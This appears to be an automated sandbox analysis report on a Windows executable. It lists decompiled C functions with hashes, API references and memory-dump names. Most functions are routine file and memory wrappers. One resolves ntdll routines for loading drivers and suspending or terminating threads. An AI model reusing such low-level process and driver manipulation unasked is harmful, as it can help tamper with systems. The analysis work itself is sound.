Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 6cf18488331c8de55bf8df2c2b0666198ccd521b8632149474be28f73699e0b4
Instruction ID: c90c2ba6e28998f2d5eed0bd3ccee310cae7302d4f530886d19d51dc87062eb8
Opcode Fuzzy Hash: 6cf18488331c8de55bf8df2c2b0666198ccd521b8632149474be28f73699e0b4
Instruction Fuzzy Hash: 1BD052B24102008BE3309F36C401726B2E8AF20726F208C2EE0D1E20C0EBB898508B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040623E, Relevance: 2.5, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040623E(intOrPtr* __esi) {

				free( *(__esi + 0x10)); // executed
				free( *(__esi + 0xc));
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}

0x00406241
0x00406249
0x00406252
0x00406254
0x00406257
0x0040625a
0x0040625d
0x00406260
0x00406263

APIs

free.MSVCRT(?,004064D9,74B04E00,?,00000000), ref: 00406241
free.MSVCRT(?,?,004064D9,74B04E00,?,00000000), ref: 00406249

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
Instruction ID: 28e7de91d8c6fb9b9a7e9865330149758d7ef971e5f4142975db03b93ce30916
Opcode Fuzzy Hash: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
Instruction Fuzzy Hash: 87D042B0904B008EC7B0DF3AD401A06BBF0BB083103108D3ED0EAD2A60EB75A0149F04

Uniqueness

Uniqueness Score: -1.00%

Function 0040D68E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 0040D6B5

Part of subcall function 0040D51E: memset.MSVCRT ref: 0040D53D
Part of subcall function 0040D51E: _itow.MSVCRT ref: 0040D554
Part of subcall function 0040D51E: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040D563

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
Instruction ID: 52ff98ee44e8e581f616b19192f74a8057abb6c9a5cdde8826008456e78d844a
Opcode Fuzzy Hash: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
Instruction Fuzzy Hash: E9E0B632400209BFCF126F94EC01AAA3F66FF04318F148469FD5C14561D3369574AF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040D049, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040D049(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E0040D071(__eax);
				_t1 = _t10 + 0x14; // 0x8d000001
				_t6 =  *_t1;
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x0040d04a
0x0040d04c
0x0040d051
0x0040d051
0x0040d057
0x00000000
0x0040d06c
0x0040d068
0x00000000

APIs

Part of subcall function 0040D071: LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,74B059F0,0040CF75,?,?), ref: 0040D07C
Part of subcall function 0040D071: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0040CF75,00000104,0040CF75,?,?), ref: 0040D068

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileLibraryLoadModuleName
String ID:
API String ID: 3821362017-0
Opcode ID: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
Instruction ID: 2a72a0c1e2ab3da33e39831b93c2ef8746b4f49573bf5205cfb9ee226a22e14b
Opcode Fuzzy Hash: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
Instruction Fuzzy Hash: DBD02231B14300ABE330EAF08C00F4BA6D86F40B18F008C3AB189F70D0C6B4C809531A

Uniqueness

Uniqueness Score: -1.00%

Function 00405E43, Relevance: 1.5, APIs: 1, Instructions: 13
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E43(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000;
				_t8 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				return _t8;
			}

0x00405e47
0x00405e5a
0x00405e61

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
Instruction ID: bef0590ae594767b07390076585e3b54dba5209a2ce075fea525828f997dfdeb
Opcode Fuzzy Hash: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
Instruction Fuzzy Hash: B7D0C93141020DFBDF01CF80DD06FDD7B7DFB04359F104064BA10A5060D7759A14AB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405E62, Relevance: 1.5, APIs: 1, Instructions: 13
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E62(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000;
				_t8 = WriteFile(_a4, _a8, _a12,  &_v8, 0); // executed
				return _t8;
			}

0x00405e66
0x00405e79
0x00405e80

APIs

WriteFile.KERNELBASE(?,?,74B04E00,00000000,00000000,?,?,00409760,00000000,0040FF4C,00000002,?,?,00000001,0040BE1B,0040F454), ref: 00405E79

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
Instruction ID: e108cc57461cd09051f83d149da4ae7cbb94a9151abf142b08e99a69ba8f508e
Opcode Fuzzy Hash: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
Instruction Fuzzy Hash: 9DD0C93101020DFBDF01CF80DD06FDD7B7DEB04359F104064BA00A5060C7B59A14AB54

Uniqueness

Uniqueness Score: -1.00%

Function 00406710, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00406710(signed int* __ecx) {
				signed int _t3;

				_t3 =  *__ecx;
				if(_t3 != 0) {
					_push(_t3); // executed
					L0040E032(); // executed
					 *__ecx =  *__ecx & 0x00000000;
					__ecx[1] = __ecx[1] & 0x00000000;
					return _t3;
				}
				return _t3;
			}

0x00406713
0x00406717
0x00406719
0x0040671a
0x0040671f
0x00406722
0x00000000
0x00406726
0x00406728

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040671A

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 4f958886a1fed562ce50c28080d2c7fd2b1c6c9b145344d0f8520b1a11cb79c8
Instruction ID: 5339db72a64abfad3c15032fde593e64a1d815d69f9877ad78659c6e85a1ca85
Opcode Fuzzy Hash: 4f958886a1fed562ce50c28080d2c7fd2b1c6c9b145344d0f8520b1a11cb79c8
Instruction Fuzzy Hash: 13C012B28282214BE7345A29E80076262D89F14366F22082EE480A31C0DAB89C808658

Uniqueness

Uniqueness Score: -1.00%

Function 00405351, Relevance: 1.5, APIs: 1, Instructions: 10
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405351(WCHAR* _a4) {
				void* _t3;

				_t3 = CreateFileW(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}

0x00405363
0x00405369

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
Instruction ID: 1e51560ea2d226d7cbdf2b9922d616c5fe3e6071316244dee5f443afb53d0edf
Opcode Fuzzy Hash: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
Instruction Fuzzy Hash: B1C092B0290200BEFE204A10AD0AF77355EE780700F1084307A00E80E1C2A14C058524

Uniqueness

Uniqueness Score: -1.00%

Function 00405338, Relevance: 1.5, APIs: 1, Instructions: 10
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405338(WCHAR* _a4) {
				void* _t3;

				_t3 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
				return _t3;
			}

0x0040534a
0x00405350

APIs

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
Instruction ID: d588f5942abdbf62074f27fc8161704726317c11aca05e571d26f2c48b98c5da
Opcode Fuzzy Hash: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
Instruction Fuzzy Hash: B3C092B0280200BEFE224A10FD16F36355DE780700F2044347E00F80E0C1604E158524

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA82, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DA82(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040D9FC, 0); // executed
				return 1;
			}

0x0040da91
0x0040da9a

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040D9FC,00000000), ref: 0040DA91

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
Instruction ID: 51e3a4b42ca36b746c75c5eb4a2aee4057f89303c93404922418ae0f581905ac
Opcode Fuzzy Hash: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
Instruction Fuzzy Hash: F5C09B3356438197C7119F508C09F1B7A95BB54705F504C397151A40E1C7714018A605

Uniqueness

Uniqueness Score: -1.00%

Function 0040405E, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040405E(void** __esi) {
				void* _t1;
				signed int* _t2;

				_t2 = __esi;
				_t1 =  *__esi;
				if(_t1 != 0xffffffff) {
					_t1 = FindCloseChangeNotification(_t1); // executed
				}
				 *_t2 =  *_t2 | 0xffffffff;
				return _t1;
			}

0x0040405e
0x0040405e
0x00404063
0x00404066
0x00404066
0x0040406c
0x0040406f

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
Instruction ID: 40547022017336ee125913f65e591b655fd6556432e54264b79cbfeb0dc3c2d4
Opcode Fuzzy Hash: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
Instruction Fuzzy Hash: ECB09270500541CBE6345F78884980A7AA4AA813703B44B28A1F6F10F2D33888468A14

Uniqueness

Uniqueness Score: -1.00%

Function 004057D1, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057D1(WCHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesW(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}

0x004057d5
0x004057e5

APIs

GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
Instruction ID: f1cceac889999bb919f5bca999730fd8e3c757b1acafb66fb331f39110631968
Opcode Fuzzy Hash: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
Instruction Fuzzy Hash: FFB012B52100014BCB1807349D4508D35905F44631B31873CB037D0CF0E730CCA8BA00

Uniqueness

Uniqueness Score: -1.00%

Function 004048DA, Relevance: 1.3, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004048DA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, void** _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t20;
				void* _t22;
				intOrPtr _t25;
				intOrPtr _t29;
				intOrPtr _t31;
				void* _t38;
				void** _t40;
				intOrPtr* _t47;

				_t38 = __edx;
				_t34 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = _a4;
				_t40 = _a12;
				_t31 = 0;
				 *((intOrPtr*)(_a4 + 0x248)) = _t40;
				_v8 = 0;
				if( *((intOrPtr*)(_t40 + 0x428)) <= 0) {
					L3:
					_t20 = 0;
					L4:
					if(_t20 != 0) {
						_t22 = E00404489(_t44 + 0x14, _t34, _t38, _t40, _t20); // executed
						_t53 = _t22;
						if(_t22 != 0) {
							E00406729( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x418)) + 0xec)), _t44 + 4);
							_t47 = _a4;
							_t25 = E00404689(_a12, _t53,  *((intOrPtr*)(_t47 + 0x220)),  *((intOrPtr*)(_t44 + 4))); // executed
							 *_t47 = _t25;
							 *((intOrPtr*)(_t47 + 0x10)) = 1;
							_v8 = 1;
						}
					}
					return _v8;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t29 = E00403F2B(_t31, _t40 + 0x41c);
					_push(_a8);
					_v12 = _t29;
					L0040E03E();
					_t34 = _t29;
					if(_t29 == 0) {
						break;
					}
					_t31 = _t31 + 1;
					if(_t31 <  *((intOrPtr*)(_t40 + 0x428))) {
						continue;
					}
					goto L3;
				}
				_t20 = _v12;
				goto L4;
			}

0x004048da
0x004048da
0x004048dd
0x004048de
0x004048e1
0x004048e5
0x004048e8
0x004048ea
0x004048f6
0x004048f9
0x00404923
0x00404923
0x00404925
0x00404927
0x0040492e
0x00404933
0x00404935
0x00404946
0x0040494d
0x00404959
0x0040495e
0x00404963
0x00404966
0x00404966
0x00404935
0x00404970
0x00000000
0x00000000
0x00000000
0x004048fb
0x004048fb
0x00404903
0x00404908
0x0040490b
0x0040490f
0x00404917
0x00404918
0x00000000
0x00000000
0x0040491a
0x00404921
0x00000000
0x00000000
0x00000000
0x00404921
0x00404973
0x00000000

APIs

_wcsicmp.MSVCRT ref: 0040490F

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp
String ID:
API String ID: 2081463915-0
Opcode ID: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
Instruction ID: fdc747c80fe88fd67bd043bcbe7cc9eb3f50563aa05d6d30472a65970944665d
Opcode Fuzzy Hash: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
Instruction Fuzzy Hash: 9D115EF5600205AFC710DF79C88099AB7B8FF48354F10453EEA55E3240D734A9508BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403FDE, Relevance: 1.3, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403FDE(void** __eax, void* __eflags, WCHAR* _a4) {
				void* __ecx;
				void* __esi;
				intOrPtr _t11;
				void* _t14;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t22;

				_t22 = __eax;
				 *(__eax + 0x414) =  *(__eax + 0x414) & 0x00000000;
				E0040405E(__eax);
				_t11 = E00405338(_a4);
				 *_t22 = _t11;
				if(_t11 == 0xffffffff) {
					L7:
					 *((intOrPtr*)(_t22 + 0x414)) = GetLastError();
					L8:
					return 0;
				}
				_t14 = E00405E43(_t22 + 4, _t11, _t22 + 4, 0x400); // executed
				if(_t14 == 0) {
					goto L7;
				}
				_t15 =  *((intOrPtr*)(_t22 + 0x418));
				if( *((intOrPtr*)(_t15 + 4)) == 0x89abcdef) {
					_t16 = _t15 + 0xec;
					__eflags =  *_t16;
					if(__eflags == 0) {
						 *_t16 = 0x1000;
					}
					E00404541(__eflags, _t22); // executed
					return 1;
				}
				 *((intOrPtr*)(_t22 + 0x414)) = 0xfff1;
				goto L8;
			}

0x00403fe0
0x00403fe2
0x00403fe9
0x00403ff2
0x00403ffb
0x00403ffd
0x0040404b
0x00404051
0x00404057
0x00000000
0x00404057
0x00404009
0x00404013
0x00000000
0x00000000
0x00404015
0x00404022
0x00404030
0x00404035
0x00404038
0x0040403a
0x0040403a
0x00404041
0x00000000
0x00404048
0x00404024
0x00000000

APIs

Part of subcall function 0040405E: FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066

Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A

GetLastError.KERNEL32(?,00000000,00403B9A,?), ref: 0040404B

Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ChangeCloseCreateErrorFindLastNotificationRead
String ID:
API String ID: 4176926985-0
Opcode ID: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
Instruction ID: 1be67c3d07cfbe594be31b534527c337e1243451ed86295bd1db7fefa69627cd
Opcode Fuzzy Hash: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
Instruction Fuzzy Hash: FD01D1F10016008AD320AB20C805B9376E8DF91315F10893FE3A6F72C1EB7C98818AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403F55, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F55(void** __esi) {
				void* _t5;
				signed int* _t7;

				_t7 = __esi;
				_t5 =  *__esi;
				if(_t5 != 0) {
					free(_t5); // executed
				}
				 *_t7 =  *_t7 & 0x00000000;
				_t7[3] = _t7[3] & 0x00000000;
				_t7[1] = _t7[1] & 0x00000000;
				return _t5;
			}

0x00403f55
0x00403f55
0x00403f59
0x00403f5c
0x00403f61
0x00403f62
0x00403f65
0x00403f69
0x00403f6d

APIs

free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
Instruction ID: 3143f4fb3421a8fd8d8aef00c743a9b8e7153b02c0e56cadf99ac6914a485b7f
Opcode Fuzzy Hash: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
Instruction Fuzzy Hash: 48C00272910B019FE7309E26C405B66B7E8AF1073BF918C1D94D5914C1D7BCD4448A14

Uniqueness

Uniqueness Score: -1.00%

Function 00406355, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406355(signed int* __esi) {
				void* _t5;
				signed int* _t7;

				_t7 = __esi;
				_t5 =  *__esi;
				if(_t5 != 0) {
					free(_t5); // executed
					 *__esi =  *__esi & 0x00000000;
				}
				_t7[1] = _t7[1] & 0x00000000;
				_t7[2] = _t7[2] & 0x00000000;
				return _t5;
			}

0x00406355
0x00406355
0x00406359
0x0040635c
0x00406361
0x00406364
0x00406365
0x00406369
0x0040636d

APIs

free.MSVCRT(00000000,004065BB,74B04E00,?,00000000), ref: 0040635C

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
Instruction ID: 3b7e158b20e84301f479c6044b2c5b8c75456169b8cefd1b15b644340405c36b
Opcode Fuzzy Hash: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
Instruction Fuzzy Hash: 8FC04C72910B019BE7349F26D449766B3E4BF1073BF618C2DA4D5914C1DBBCE494CA18

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040C41D, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C41D() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x4132c4 == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x4132c4 = _t2;
					 *0x413294 = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x413298 = GetProcAddress( *0x4132c4, "NtLoadDriver");
					 *0x41329c = GetProcAddress( *0x4132c4, "NtUnloadDriver");
					 *0x4132a0 = GetProcAddress( *0x4132c4, "NtOpenSymbolicLinkObject");
					 *0x4132a4 = GetProcAddress( *0x4132c4, "NtQuerySymbolicLinkObject");
					 *0x4132a8 = GetProcAddress( *0x4132c4, "NtQueryObject");
					 *0x4132ac = GetProcAddress( *0x4132c4, "NtOpenThread");
					 *0x4132b0 = GetProcAddress( *0x4132c4, "NtClose");
					 *0x4132b4 = GetProcAddress( *0x4132c4, "NtQueryInformationThread");
					 *0x4132b8 = GetProcAddress( *0x4132c4, "NtSuspendThread");
					 *0x4132bc = GetProcAddress( *0x4132c4, "NtResumeThread");
					_t14 = GetProcAddress( *0x4132c4, "NtTerminateThread");
					 *0x4132c0 = _t14;
					return _t14;
				}
				return _t1;
			}

0x0040c424
0x0040c430
0x0040c442
0x0040c454
0x0040c466
0x0040c478
0x0040c48a
0x0040c49c
0x0040c4ae
0x0040c4c0
0x0040c4d2
0x0040c4e4
0x0040c4f6
0x0040c508
0x0040c50d
